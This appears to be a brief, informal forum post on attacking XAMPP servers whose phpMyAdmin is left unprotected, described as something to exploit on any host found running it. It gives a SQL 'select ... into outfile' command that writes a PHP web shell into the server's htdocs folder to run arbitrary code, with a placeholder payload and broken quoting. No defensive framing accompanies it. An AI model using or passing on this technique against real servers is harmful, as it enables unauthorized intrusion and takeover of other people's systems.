xampp vuln.


One of the vulns of xampp is that the phpmyadmin is unprotected. Therefor, if you can find a host running xampp you can most likely exploit it by entering i.p.a.d.r/phpmyadmin

From there you can do all forms of nasy stuff, for example:

Run in SQL;

select "<?php *WHATEVER PHPCODE YOU WANT TO RUN ?> into outfile "C:\xampp\htdocs\shell.php"

This enables you to run whatever php code you wish.